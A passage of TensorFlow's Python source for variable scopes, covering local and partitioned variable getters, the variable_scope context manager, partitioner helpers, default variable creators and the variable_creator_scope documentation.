partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect for once when creating. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
finally:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
